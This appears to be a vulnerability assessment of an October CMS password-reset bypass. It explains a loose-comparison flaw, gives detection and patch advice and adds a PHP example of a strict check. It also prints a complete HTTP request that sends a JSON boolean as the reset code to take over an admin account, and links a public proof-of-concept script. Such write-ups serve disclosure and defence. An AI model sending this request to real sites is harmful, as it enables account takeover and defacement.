octobercms is a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.

**Recent assessments:**

**kevthehermit** at January 14, 2022 5:01pm UTC reported:

### Overview

This is a simple Type Confusion / Juggling vulnerability. October CMS will check to see if the user-supplied reset code matches the value in the database:

`return ($this->reset_password_code == $resetCode);`

If we can send a boolean value in place of a reset code we can bypass this check. Laravel has a feature that if an HTTP POST request is sent as JSON then it will be converted to a matching form data set; however, the types will persist. To exploit this vulnerability we simply need to set the `Content-Type` to JSON and structure our POST request accordingly. An example POST is shown below.

```http
POST /backend/backend/auth/reset/1/[] HTTP/1.1
Host:
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin:
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9
Connection: close

{"_session_key":"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC","_token":"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS","postback":1,"id":1,"code":true,"password":"hello"}
```

### In the Wild

This has not been verified, but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites: <https://twitter.com/KimZetter/status/1481890639029551106>

### PoC

A proof-of-concept Python script that will attempt to reset the password for the admin account has been published: <https://github.com/Immersive-Labs-Sec/CVE-2021-32648>

### Detection

An attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.

### Mitigation

Applying the patches will successfully mitigate this attack.

Assessed Attacker Value: 2
Assessed Attacker Value: 2
Assessed Attacker Value: 5
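The type juggling described in the assessment above, as an added example in PHP. This is not code from October CMS or Laravel and not the project's patch: `UserRecord`, `checkResetCodeLoose`, `checkResetCodeStrict` and `decodeBody` are hypothetical names, the stored reset code is a constructed value, and Laravel's request layer is stood in for by `parse_str()` and `json_decode()`, which yield the same PHP types (form fields are always strings; JSON keeps its types). The loose check is the one-line comparison quoted in the assessment; the strict version is one way to harden it.

```php
<?php
// Added example, not code from October CMS or Laravel and not the project's
// fix: models the loose reset-code comparison quoted in the assessment and
// shows why a JSON boolean passes it while a form-encoded value does not.
declare(strict_types=1);

final class UserRecord // hypothetical stand-in for the backend user model
{
    // Constructed sample value standing in for the reset code issued by
    // "forgot password"; the real code is random and stored per user.
    public ?string $reset_password_code = 'c0nstructedResetCode8f3a';

    // The vulnerable check as quoted in the assessment: PHP loose comparison.
    // When one operand is a bool, PHP converts the other to bool first, so any
    // non-empty stored code == true.
    public function checkResetCodeLoose($resetCode): bool
    {
        return ($this->reset_password_code == $resetCode);
    }

    // A hardened check (example only): refuse anything that is not a string
    // and compare strings in constant time. hash_equals() throws a TypeError
    // on non-string input in PHP 8, so the type guard must come first.
    public function checkResetCodeStrict($resetCode): bool
    {
        if (!is_string($resetCode) || !is_string($this->reset_password_code)) {
            return false;
        }
        return hash_equals($this->reset_password_code, $resetCode);
    }
}

// Simulates how the two request encodings reach application code (hypothetical
// helper replacing Laravel's request parsing): form bodies decode to strings,
// JSON bodies decode with their JSON types preserved.
function decodeBody(string $contentType, string $body): array
{
    if ($contentType === 'application/json') {
        $decoded = json_decode($body, true, 512, JSON_THROW_ON_ERROR);
        return is_array($decoded) ? $decoded : [];
    }
    parse_str($body, $fields);
    return $fields;
}

$user = new UserRecord();

$cases = [
    // [label, Content-Type, constructed request body]
    ['form, code=true',   'application/x-www-form-urlencoded', 'code=true&password=hello'],
    ['json, "code":true', 'application/json',                  '{"code":true,"password":"hello"}'],
    ['json, real code',   'application/json',
        json_encode(['code' => $user->reset_password_code, 'password' => 'hello'])],
];

foreach ($cases as [$label, $contentType, $body]) {
    $code = decodeBody($contentType, $body)['code'];
    printf(
        "%-20s code=%-30s loose=%-5s strict=%s\n",
        $label,
        var_export($code, true),
        var_export($user->checkResetCodeLoose($code), true),
        var_export($user->checkResetCodeStrict($code), true)
    );
}
```

Run it with `php` on the command line. The form-encoded body delivers the string `"true"`, which fails both checks because two non-numeric strings are compared as strings; the JSON body delivers the PHP boolean `true`, which the loose check accepts, as the assessment describes, while the strict check rejects it and still accepts the genuine code.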